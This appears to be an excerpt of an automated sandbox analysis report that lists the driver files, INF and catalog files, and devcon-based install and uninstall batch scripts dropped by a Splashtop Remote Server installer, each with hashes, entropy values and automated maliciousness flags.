                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature..= "$CHICAGO$"..Class...= MEDIA..Provider..= %ST%..ClassGUID..= {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer = 02/14/2022,1.0.3.0..CatalogFile .= stvad.cat....[SourceDisksNames.x86]..222 = "STVAD Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVAD Driver Disk","",222,\64bits....[SourceDisksFiles]..stvad.sys = 222....;;This syntax is only recognized on Windows XP and above- it is needed to install 64-bit drivers on..;;Windows Server 2003 Service Pack 1 and above.....[Manufacturer]..%MfgName% = SplashtopDS, NTAMD64, NTx86....;; For Windows Server 2003 Service Pack 1 and above, a 64-bit OS will not install a driver..;; unless the Manufacturer and Models Sections explicitly show it is a driver for that platform..;; But the individual model section decorations (or lack thereof) work as they always have...;; All of the model sections referred to are undecorated or NT-decorated, hence work on all platforms....[SplashtopDS]..%STVAD.DeviceDesc% =

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):206
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.79285514077006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9R7:kWZ9dAudm95dyE239nd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:9EAFE2CC76D906E1C4F0FCB2A485A453
                                                                                                                                                                                                                                                                                                                                  SHA1:51D48B136B7AD1BBA162D3674F249A6832F9B55E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C01560D63FA71D8492B5B866E02902EA5AD8DF54B5678DCA54160F787AD7BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:76D1A89F064AD7C9B89D9FBD06735837E4B47220F2B790B2BE3DCC63251923F7D0B2B8DB5B3983D4E7B94DA1DFCB3EC9EC81C0927446E05D4EECA9CD293CE4F8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.871313263028117
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9R7:kWZ9dAudE95d0E239Jd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:A2DA78EF1F7BC59138D71F85D6310ECA
                                                                                                                                                                                                                                                                                                                                  SHA1:912DCBFF74495F0235A969BCE934B421086DD175
                                                                                                                                                                                                                                                                                                                                  SHA-256:A980C2CD38F4D2F06E6A5DC96BFFFB8EC39A7A1254D5FF6ED1E7F44048F66AE1
                                                                                                                                                                                                                                                                                                                                  SHA-512:32DAD786E55680F653F7F5570189E2C0F815CE0A69221B91743B67407587E9A13C414E5ECCEB2CD02A3C0A805E3D6D2639948DD22DFAC3B6FF56D74CC468AD56
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\32bits\stvad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.720475524234058
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:G9CoFe+yIPYhqU1YQ7YemerV3hvrOyk3hH63:G9PFe3VYq3hvrOX3hH+
                                                                                                                                                                                                                                                                                                                                  MD5:A9D239E41BAED5879255923481C73D11
                                                                                                                                                                                                                                                                                                                                  SHA1:FE581685174CEFCAD994BB8EC1A70537BB8CA626
                                                                                                                                                                                                                                                                                                                                  SHA-256:5118FB2A6A4B1E37AA12544E5864B77733739FB5EFBC4997F3A5A3EF385FE9B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:5460CDDD61A79C9C4982106344F4354E55C93AC996EF7315DE635F2F45EFE8A9BDFF37664137E7307E8C9654BCD16ACC65B8471D08E09DAA798502B0973E3DAD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................................#.........Rich...................PE..L....0Ca.................D...&......0p....... ....@.................................N.....@E................................xp..P.......p............n...C...........(..8...........................8)..@............ ...............................text............................... ..h.rdata....... ......................@..H.data........0....... ..............@...PAGE.....,...@.......0.............. ..`INIT.........p.......^.............. ..b.rsrc...p............d..............@..B.reloc...............h..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\64bits\stvad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.411029825578745
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HD4P58VeNfba5EMjxMXOkvmWvwDtmmEfdgA5lER3hjgxW3hyB:8PiVeNYEMVz4TVRl+3hjgg3hyB
                                                                                                                                                                                                                                                                                                                                  MD5:E623E53FAE062F43180174FA01E7B6E0
                                                                                                                                                                                                                                                                                                                                  SHA1:7843125E12A3DF5A9DC1FB052CCC34B993A18F00
                                                                                                                                                                                                                                                                                                                                  SHA-256:D68E13044485D730E183449E3F34D45E319199D376C7528FC8DDA87CA5A22034
                                                                                                                                                                                                                                                                                                                                  SHA-512:26E342BC8E28CB447BF4F1FC4F1A7A0CA2186B4AC78CDC062B29CC206ED1FAC2E0825748DF26AA0E893795820A77D6D269F4DFCB2162E5877710D7DE8FD1365B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t`X.............~.......~...............~.......~.......`.......`.......`......Rich............PE..d....0Ca.........."......R...8......0..........@.........................................`A....................................................<.......p....p...........C......T....<..8...........................P<...............0..0............................text...i........................... ..h.rdata.......0......................@..H.data........P.......,..............@....pdata.......p.......@..............@..HPAGE.....7.......8...F.............. ..`INIT.................~.............. ..b.rsrc...p...........................@..B.reloc..T...........................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.794885910225241
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9RNIgm9MOdELVb4NMD7:EWZ9dAudm95dyE239nd9RGpDdwh7
                                                                                                                                                                                                                                                                                                                                  MD5:1690361AD6F64AA935F0C71847F763B6
                                                                                                                                                                                                                                                                                                                                  SHA1:5F8682A46B5A4DF1F03D8078240F6619B0C90DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CBA410A986FD863C69BDB98311A2F49E04F3ED7C1499C6A5557B7BA856B5AE
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CE17EEF081E5C7F68E7584413C65242A1CE240B23F1226906DB6F6BC12E97B834545DA6B43BE5903D6EDBC66B1899634D9115E6688961F5547297819989D2EE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon.exe install stvad.inf *STVAD >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864786270026779
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9RNIgm9MOdRL6Vb4NMD7:kWZ9dAudE95d0E239Jd9RGpDdCh7
                                                                                                                                                                                                                                                                                                                                  MD5:678C5FB9E1F87E4986E2B80B55740A9C
                                                                                                                                                                                                                                                                                                                                  SHA1:3E30F2B668EEAE7F8D0A192F6F3B9EE6213D58E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E04797F8F85EAAB68DA60C9E2F08E224DBF379ECC6085BD2A8C79974FF1D46E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6FD46FE165ACB6169056465248078B9794669846B57E616F8DB923C6EDD324A625BE968E499463BADC7B99660A8CE3304333BA9D92D8907C98C6B3CB6B7DB6E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon64.exe install stvad.inf *STVAD >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\stvad.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18540
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.313988713784432
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:1+wARK7Nm4UB1LtL8JN77hh/onRK7Nm4UxY28JN77hh07V:8wUh23hRoR83hGV
                                                                                                                                                                                                                                                                                                                                  MD5:52973E06C8A2587300797DEBD419A08C
                                                                                                                                                                                                                                                                                                                                  SHA1:8D13082BEEF0B4240B67F7D04809A25C8CC3834F
                                                                                                                                                                                                                                                                                                                                  SHA-256:AACA5F16D57F7C9CBA15F8420FA57CB0F222F3FD28051FD1C103AEBEBA681D05
                                                                                                                                                                                                                                                                                                                                  SHA-512:60CE0E47DD5B42DB77BBF507AEB939CA26ECA50A5A6F5FF4731D4E65230335BC5F8E47A1B60466B6BB2CACB582F7F0BEACEAA956A2A50D5C5645F0591D4DF8B0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.Hh..*.H........HY0.HU...1.0...+......0.....+.....7......0...0...+.....7........[.nA.jC`.S....210916120921Z0...+.....7.....0...0....R5.6.4.E.F.8.7.0.9.0.7.9.8.F.7.A.6.2.5.7.4.B.6.0.2.C.F.3.1.2.3.D.C.E.D.2.3.4.6.3...1..O06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...s.y.s...0M..+.....7...1?0=0...+.....7...0...........0!0...+........VN.p.y.zbWK`,..=..4c0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R8.7.8.1.B.4.C.0.6.1.9.4.5.A.2.E.8.E.0.1.0.E.F.1.2.9.8.5.9.B.D.1.A.A.3.1.3.C.7.5...1..G06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...i.n.f...0E..+.....7...17050...+.....7.......0!0...+............a.Z.....)...1<u0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RF.4.9.D.9.9.6.B.8.8

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\stvad.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3217
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.702969738113695
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:2kQG735yUI8LeHdT3I8vV4xDKKr84QM5MFgWCwj:2kQG7pyye1B4x+I8pj
                                                                                                                                                                                                                                                                                                                                  MD5:1574CF3E123B96142ACF789F852119FF
                                                                                                                                                                                                                                                                                                                                  SHA1:8781B4C061945A2E8E010EF129859BD1AA313C75
                                                                                                                                                                                                                                                                                                                                  SHA-256:3FF183B875687A9A2BAF0FBEFA52AC04CD5E869E6E4FD535CC7D1D1F4825A003
                                                                                                                                                                                                                                                                                                                                  SHA-512:29EA441281BA5A4E7B427335E36D0D6FA2A103D852DD16E460C4BE62E2640AE2117C1C64CFE6BFDC2A22FE9ADDE71B74DB5A1A6BF80D7BE0953FD593401F0311
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature..= "$CHICAGO$"..Class...= MEDIA..Provider..= %ST%..ClassGUID..= {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer ..= 09/16/2021, 1.0.2.0..CatalogFile .= stvad.cat....[DestinationDirs]..STVAD.CopyList = 10,system32\drivers....[SourceDisksNames.x86]..222 = "STVAD Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVAD Driver Disk","",222,\64bits....[SourceDisksFiles]..stvad.sys = 222....[Manufacturer]..%MfgName% = Splashtop, NTAMD64, NTx86....[Splashtop.NTAMD64]..%stvad.DeviceDesc% = STVAD, *STVAD....[Splashtop.NTx86]..%stvad.DeviceDesc% = STVAD, *STVAD....[STVAD]..AlsoInstall..= ks.registration(ks.inf),wdmaudio.registration(wdmaudio.inf)..CopyFiles..= STVAD.CopyList..AddReg...= STVAD.AddReg....[STVAD.CopyList]..stvad.sys....[STVAD.Interfaces]..AddInterface.= %KSCATEGORY_AUDIO%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATEGORY_RENDER%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATEGORY_CAPTURE%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATE

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):206
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.79285514077006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9R7:kWZ9dAudm95dyE239nd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:9EAFE2CC76D906E1C4F0FCB2A485A453
                                                                                                                                                                                                                                                                                                                                  SHA1:51D48B136B7AD1BBA162D3674F249A6832F9B55E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C01560D63FA71D8492B5B866E02902EA5AD8DF54B5678DCA54160F787AD7BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:76D1A89F064AD7C9B89D9FBD06735837E4B47220F2B790B2BE3DCC63251923F7D0B2B8DB5B3983D4E7B94DA1DFCB3EC9EC81C0927446E05D4EECA9CD293CE4F8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.871313263028117
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9R7:kWZ9dAudE95d0E239Jd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:A2DA78EF1F7BC59138D71F85D6310ECA
                                                                                                                                                                                                                                                                                                                                  SHA1:912DCBFF74495F0235A969BCE934B421086DD175
                                                                                                                                                                                                                                                                                                                                  SHA-256:A980C2CD38F4D2F06E6A5DC96BFFFB8EC39A7A1254D5FF6ED1E7F44048F66AE1
                                                                                                                                                                                                                                                                                                                                  SHA-512:32DAD786E55680F653F7F5570189E2C0F815CE0A69221B91743B67407587E9A13C414E5ECCEB2CD02A3C0A805E3D6D2639948DD22DFAC3B6FF56D74CC468AD56
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.847750617309462
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:b9aXVnIo4e86mU2IpU88ukl7qqOky4QqSmOOgY3hs3BMBs3hsU4hJt34lz2:b9uV54e8Q6uoramO43hs3h3hsU4/tgy
                                                                                                                                                                                                                                                                                                                                  MD5:48A8D41400F7D4729A0FB3102B2FD7AF
                                                                                                                                                                                                                                                                                                                                  SHA1:709FCD8676F7E618B1D519D7C84422D90EAC81AD
                                                                                                                                                                                                                                                                                                                                  SHA-256:158BF7761E9A254E5D4608E62D11B86A682E505413C86128999F8EDC6294645D
                                                                                                                                                                                                                                                                                                                                  SHA-512:845DA37A4FC90DB0E4D1A0CE51E9436F3AB65289C4CAE189999A72DC516F09750FBE43D681746E5BD0C5E4E90C246BC58ADF95239A19A3E3E71000C0E8B46018
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................................#.........Rich...................PE..L...1.'a.................>...&......0p....... ....@.......................................@E................................xp..P.......p............h...g...........(..8............................)..@............ ...............................text...g........................... ..h.rdata..l.... ......................@..H.data...0....0......................@...PAGE....")...@...*.................. ..`INIT....8....p.......X.............. ..b.rsrc...p............^..............@..B.reloc...............b..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\64bits\stvspk.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.649199158440194
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Qidu9HV92g74x9xMtsqRdUx2PEvp/MuTP3hs0KI3hsE5Et367SH:09HV92Z9fx/MYP3hs0t3hsE+tK7+
                                                                                                                                                                                                                                                                                                                                  MD5:FFC5D6FFD92E2F5DD7D454B5EA624825
                                                                                                                                                                                                                                                                                                                                  SHA1:22DC6D072A87B95A215735D8A9002757F1C99F4B
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF3806D063FD4982791FA5F5C50DDC5B7F49B40615F6CFCE96016571CA4AF7CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:653CAB148E0CE24DF36C1EC02760F19C9100542FCA5885B665E8F98EE82118B7930D3B9C8BAF18C1D08B5E1D3D5F7B3DDF0041581116BA5973CE30DFF4C4A958
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t`X.............~.......~...............~.......~.......`.......`.......`......Rich............PE..d...-.'a.........."......H...4......0..........@.....................................g....`A....................................................<.......p....`..h........g......L....+..8........................... ,............... ...............................text............................... ..h.rdata....... ......................@..H.data........@.......&..............@....pdata..h....`.......:..............@..HPAGE.....1...p...2...@.............. ..`INIT.................r.............. ..b.rsrc...p............x..............@..B.reloc..L............|..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):286
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.868409179176479
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd94wqJ6dA3OdqA3PMOdyE23PMmfPP0NIgm4OdELV5FaA37:EWH9dAedNtdyE23rH0GpBdM97
                                                                                                                                                                                                                                                                                                                                  MD5:A9A42F8DE6BBE12230621C01C8FD5987
                                                                                                                                                                                                                                                                                                                                  SHA1:360D7B9C960AA8BCFAB960F5BC8FE4C8217BFF1D
                                                                                                                                                                                                                                                                                                                                  SHA-256:377B50263A4EC36A0133666CCC089CC065119FE290FA53D9397D414BFDE6DDF3
                                                                                                                                                                                                                                                                                                                                  SHA-512:CFCBE219768697E54E62F27C0BC318590055BD70BBAB73262ED93B4F7B8A993D6984DB2CE1A0DABE65A2E83204FAE61AB4896BCA56385E49DA7527B4567EDDFD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon.exe remove *STVSpkSimple >> inst.log...\utils\devcon.exe rescan >> inst.log...\utils\DIFxCmd.exe /u stvspk.inf >> inst.log....REM install...\utils\devcon.exe install stvspk.inf *STVSpkSimple >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):290
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.94060950303714
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdRLiA3PMOdRLKE23PMmBPP0NIgm4OdRL6V5FaA37:kWH9dAedDtd0E239H0GpBdm97
                                                                                                                                                                                                                                                                                                                                  MD5:9DC29B6F9CC69C534977BFCDC98E2705
                                                                                                                                                                                                                                                                                                                                  SHA1:4AA931BE2C7297A93CEC4172F48EDDD8DBC4E3AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:78CEDF996370DF8A59521A77BDDB7118610924A02625AA53BFE47975A23B3B8D
                                                                                                                                                                                                                                                                                                                                  SHA-512:5227EFC53C6D12C012691A920ADB77B51E9E939294B7B690774BDC16EFAC877D9D92C409D5197244279F4BE8052CA8FA9FCD37D82178807DABA8D0F528F179A7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon64.exe remove *STVSpkSimple >> inst.log...\utils\devcon64.exe rescan >> inst.log...\utils\DIFxCmd64.exe /u stvspk.inf >> inst.log....REM install...\utils\devcon64.exe install stvspk.inf *STVSpkSimple >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\stvspk.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
